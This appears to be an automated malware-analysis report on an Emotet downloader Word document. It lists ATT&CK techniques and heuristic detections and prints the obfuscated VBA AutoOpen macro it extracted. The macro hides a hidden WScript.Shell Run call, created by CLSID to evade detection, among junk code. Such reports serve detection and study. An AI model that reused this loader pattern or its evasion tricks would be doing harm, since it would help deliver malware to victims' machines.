MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.003 Windows Command Shell
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine that leverages WScript.Shell to execute suspicious commands. The macro attempts to download and execute a second-stage payload using a combination of cmd.exe and PowerShell, as indicated by the heuristic firings and the reconstructed command line. The ClamAV detection as 'Doc.Downloader.Emotet-6765660-0' strongly suggests the Emotet family.
Heuristics 10
-
ClamAV: Doc.Downloader.Emotet-6765660-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6765660-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
Set IzosR = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HQbvRacK) On Error Resume Next -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set IzosR = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HQbvRacK) On Error Resume Next -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10107 bytes |
SHA-256: 7adf6c6e53a5ee0ecc79a6ed430762367edf8892dc4431367c4be3ecf3f219c1 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
155 of 231 identifiers look randomly generated (e.g. 'NtVWpNDacLXfki') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NtVWpNDacLXfki"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case inoDS
Case 297142988
UicvcJcX = Hex(iWYSwfkr)
pdNDi = Cos(248373298)
sHDiRr = 104002864
Case 231241759
BbacTip = Hex(MBdJqED)
wucPV = Sqr(113778292 / CSng(312267001 - Cos(278561238 - 190747474) + CZpPrGpv + Rnd(326350301 - 23502500)))
PoKon = Hex(hIJCCzfVw)
End Select
For Each TBkjkzjc In kzKWUu
AthFR = 174073123 + Oct(226713646) - 178685378 - CBool(94160608 / 222403560) * 130161962 + Log(AZKuuTVu - CLng(88934742)) - 154680715 + Hex(PFiYCsW)
Next
On Error Resume Next
Select Case JGrBm
Case 247758443
wsCqUE = Hex(uwQuDstsu)
QDzoOLoMp = Cos(229392556)
KVYDzpVHM = 23682995
Case 84362829
PvIfMmkJ = Hex(LBkjni)
jOdfVukb = Sqr(288385190 / CSng(283273131 - Cos(40514731 - 23483270) + limDWhs + Rnd(42108336 - 212951426)))
aEZjwTn = Hex(JLnazZ)
End Select
For Each LVLjnVjh In fcOjMGlb
mDbwO = 249240316 + Oct(51444387) - 28298868 - CBool(152108987 / 321884315) * 291559490 + Log(KkMWLMjZ - CLng(296695384)) - 44728387 + Hex(WoAVFGHDZ)
Next
On Error Resume Next
Select Case pGipGBW
Case 106505152
rmrmaaG = Hex(bWPBw)
EXYpXz = Cos(225948699)
cTDskMpTD = 31413548
Case 56130032
LLkodfOi = Hex(jTattiR)
MzQnuKYi = Sqr(224971823 / CSng(272274480 - Cos(303612726 - 72935234) + TKtLB + Rnd(294479071 - 259499898)))
LrkzUszd = Hex(qiXlrFrzQ)
End Select
For Each LFvqU In UQJjisl
zBHjoaR = 165275376 + Oct(33303801) - 232842663 - CBool(331566756 / 75730962) * 259172734 + Log(bEBOlqc - CLng(201189052)) - 101057180 + Hex(PbAbq)
Next
Set LWFPHZY = Shapes("OAGzqOQvE")
On Error Resume Next
Select Case NAHtJWli
Case 274094184
cjSLsEo = Hex(AzWwXTimw)
KkzOS = Cos(293878410)
QoLziYa = 140544511
Case 73424190
vKsEAU = Hex(JVJPdoL)
XkYFZNR = Sqr(172879011 / CSng(225061842 - Cos(182635491 - 108398096) + zWYwcLH + Rnd(253214646 - 182455611)))
wJPZF = Hex(iNnAzaHoC)
End Select
For Each mwikKc In rYmwNmRh
vRnOqzH = 129990186 + Oct(285928511) - 133420729 - CBool(267975740 / 107623753) * 199685354 + Log(OktNZII - CLng(284320740)) - 316405109 + Hex(YXBSAV)
Next
On Error Resume Next
Select Case uoBCd
Case 307242244
bUhzG = Hex(CrWzUWIH)
dNlEHTFPm = Cos(246377558)
ztiVq = 277942258
Case 17089242
REBIhwOFb = Hex(MhCtv)
nQYnoV = Sqr(34844624 / CSng(307586521 - Cos(78376792 - 334105924) + INBGiUNqu + Rnd(180616666 - 31639197)))
FsOiG = Hex(DFDzSha)
End Select
For Each PGvzHz In IFrZCiNo
BjiMS = 309251431 + Oct(173155768) - 283161521 - CBool(335825026 / 132218507) * 55370527 + Log(nLuUjMFGu - CLng(308671783)) - 134483356 + Hex(VzmWF)
Next
bwZovYtihZQ = "" + QAwjzOzU + FWVIiIGP + AmopV + UIDlvbSc + LWFPHZY.TextFrame.TextRange.Text + LVSNla + hTjcsZzh + ispTYXi
On Error Resume Next
Select Case hAIHaqzl
Case 17329744
XtCRCHad = Hex(BLHBMl)
RzfOr = Cos(322791884)
QOYMmj = 322996516
Case 217960341
aSSvLs = Hex(YvsTicZzv)
YYBFoua = Sqr(205453149 / CSng(252493315 - Cos(18835337 - 202710661) + ouTUAhiup + Rnd(280898477 - 166230581)))
GSwdf = Hex(pZRQKYfG)
End Select
For Each XsQZpQdH In zNcsQAfhz
wVwwzwNFd = 153904715 + Oct(233897724) - 311624829 - CBool(273331635 / 301685126) * 311998045 + Log(CZRjmd - CLng(75651301)) - 916371 + Hex(RKzIQkd)
Next
On Error Resume Next
Select Case QNmwwjsG
Case 240211210
nGtnJZ = Hex(KtWLKqzDq)
jqbTUwG = Cos(212861568)
wczszPMA = 41458745
Case 39994165
bVoLQjGZG = Hex(otIIJQI)
TKnHccVLB = Sqr(168830718 / CSng(318563894 - Cos(326982353 - 271377991) + zwwNBQDnp + Rnd(213944852 - 172770010)))
Ijqjo = Hex(EBmvGTsLp)
End Select
For Each fjdIi In wMMvOswjU
hTUmU = 118277719 + Oct(245924986) - 322873548 - CBool(300164888 / 260300689) * 34375543 + Log(pcUqb - CLng(326611718)) - 53013867 + Hex(DRaMn)
Next
On Error Resume Next
Select Case wMoAPPbB
Case 87910525
YsCOzV = Hex(vnKiNB)
hWNuFZ = Cos(307056184)
TNCXtrCKJ = 18486704
Case 318903461
UjwOcn = Hex(CPBzlL)
SsBhwoU = Sqr(205022139 / CSng(163737448 - Cos(264556565 - 74755354) + cTsdAfQ + Rnd(246548096 - 331731207)))
azSRIsdSO = Hex(MXYKIc)
End Select
For Each IvoKI In ALzJl
UUZXU = 115888526 + Oct(11265198) - 95068723 - CBool(203631582 / 209601975) * 184149621 + Log(GatPF - CLng(305113156)) - 226382970 + Hex(YZIpJnS)
Next
On Error Resume Next
Select Case nSNvG
Case 218559149
vXjjDt = Hex(DUhMrU)
ufZsldzh = Cos(81186579)
nGjHZw = 251302502
Case 179102129
KuSOOU = Hex(cKCVSc)
ZsnnDVD = Sqr(118275175 / CSng(95815361 - Cos(72788365 - 126658097) + wJKdVvlZJ + Rnd(256893983 - 184820919)))
KXSBmi = Hex(vKjKOmLiG)
End Select
For Each sfHvSY In Rhjaj
NmQWc = 211046103 + Oct(15327702) - 12272793 - CBool(204970989 / 235081132) * 134518863 + Log(mNzwrKM - CLng(208526764)) - 70953305 + Hex(HUVswJ)
Next
Set IzosR = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + HQbvRacK)
On Error Resume Next
Select Case mLNnzIhO
Case 318796373
TrwZIl = Hex(iKtnMQsuI)
OrAYFiXEw = Cos(94032895)
icrifika = 206462394
Case 254775964
jsXTjvavV = Hex(pOSXvsONb)
MXEEiBI = Sqr(214354380 / CSng(221116528 - Cos(50486244 - 134954040) + HOKIBlu + Rnd(184025868 - 197142147)))
svoNY = Hex(jpWME)
End Select
For Each nJoSlh In tNNYMHEM
rcSzrLiI = 104843025 + Oct(136859729) - 189072095 - CBool(6785995 / 321183283) * 288613831 + Log(IYqbBTiA - CLng(88116908)) - 269796070 + Hex(mfWbGUvv)
Next
On Error Resume Next
Select Case kYKGDNQhB
Case 32361328
jCVNGHAbr = Hex(qtwfdTG)
JzOtf = Cos(176173696)
fjRbsWjjT = 194519781
Case 194062419
jrwpOObuf = Hex(aatKhr)
bmWuV = Sqr(177884666 / CSng(159228539 - Cos(232546469 - 338696628) + zKJfCzWWI + Rnd(87765900 - 51709209)))
fEjNUIrii = Hex(ocrqGCOQ)
End Select
For Each GPQbjWj In aWnZizc
SNIGP = 291362688 + Oct(112570750) - 105605341 - CBool(71944023 / 141817071) * 220431221 + Log(LsUIrpBj - CLng(98890235)) - 186479902 + Hex(rnjQLuPKc)
Next
On Error Resume Next
Select Case orkcpQnv
Case 116550386
jsPBw = Hex(wcjBVAdp)
dtzHUIv = Cos(210362330)
aQVYD = 182742411
Case 180431024
zwpvQhL = Hex(rnTESnO)
wMWqnztkM = Sqr(96131937 / CSng(182186258 - Cos(214963699 - 73843776) + YIawBjA + Rnd(232639825 - 86050556)))
lkcVcb = Hex(mCabrEkk)
End Select
For Each DEiBF In LTOKiVm
uNzKFDUY = 51539756 + Oct(249438119) - 215384182 - CBool(271442479 / 200477238) * 240793913 + Log(hDpMzdvAL - CLng(42836254)) - 40844812 + Hex(JGRwMAU)
Next
Const RPiFGfwvStu = 0
On Error Resume Next
Select Case iViWqw
Case 156677388
qcmsiVDj = Hex(kdXdzH)
GdihOZ = Cos(60276493)
wFMoaClFH = 84169984
Case 288013826
Btkpf = Hex(alElmi)
TPNTqa = Sqr(112000656 / CSng(125683208 - Cos(296237086 - 316770504) + JOJSzYP + Rnd(107946699 - 51412118)))
JNtpB = Hex(wXoKTdaGm)
End Select
For Each lRmalIw In jRJImj
WbKKCTi = 266336476 + Oct(205042681) - 118679498 - CBool(315234300 / 27852226) * 246026376 + Log(fnDfa - CLng(256170493)) - 327169446 + Hex(hRBQiIk)
Next
On Error Resume Next
Select Case IFfOYPP
Case 36195674
WmzTk = Hex(NhiIOwX)
zhpME = Cos(133138142)
SLfHOwN = 85017656
Case 252250112
hDUBUwCv = Hex(Jqwpqhkwj)
jCKlmEaT = Sqr(76856425 / CSng(148135368 - Cos(171803603 - 2403866) + scjsDF + Rnd(200645502 - 245563669)))
RIKiVWpa = Hex(zjjCdWS)
End Select
For Each wtcqZVJW In MKohs
vwlCa = 53947260 + Oct(229652445) - 28315535 - CBool(198534064 / 243722690) * 295594303 + Log(TopzJaV - CLng(59069315)) - 241838431 + Hex(vrmBI)
Next
IzosR.Run! bwZovYtihZQ, RPiFGfwvStu
On Error Resume Next
Select Case BwdYlXN
Case 323852527
wESZv = Hex(zHjcBdjGL)
OoVdKhY = Cos(91557138)
RwVZLwa = 46241257
Case 191777847
kRXzA = Hex(ibPJzU)
SuWirTvQ = Sqr(213593427 / CSng(26949528 - Cos(5430934 - 202045144) + dhYjaWDzb + Rnd(82170438 - 285230810)))
VSbGJDbwI = Hex(ioNin)
End Select
For Each sENWUDhB In ijbRr
ifsVATKXA = 168523673 + Oct(227484849) - 265037864 - CBool(167373702 / 16861258) * 239338512 + Log(rjVFXz - CLng(138135021)) - 140162798 + Hex(laDaUA)
Next
On Error Resume Next
Select Case JdIiftNw
Case 332550632
XUakh = Hex(hrvsrTM)
oNdzmnAlR = Cos(151178452)
CRVrTscw = 141395772
Case 163698206
wGEABLii = Hex(pQMtRPPMK)
mDDzf = Sqr(38595861 / CSng(78183823 - Cos(341344584 - 184410428) + OVrWCPXtl + Rnd(251483282 - 270056526)))
idwlE = Hex(aDdQnMm)
End Select
For Each vJYvpLGj In UZpqCsW
YTjUZAt = 5857004 + Oct(231100347) - 169591637 - CBool(160172469 / 147178728) * 326579753 + Log(ikTUOUqw - CLng(194095395)) - 319646716 + Hex(wcMPmXLHp)
Next
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.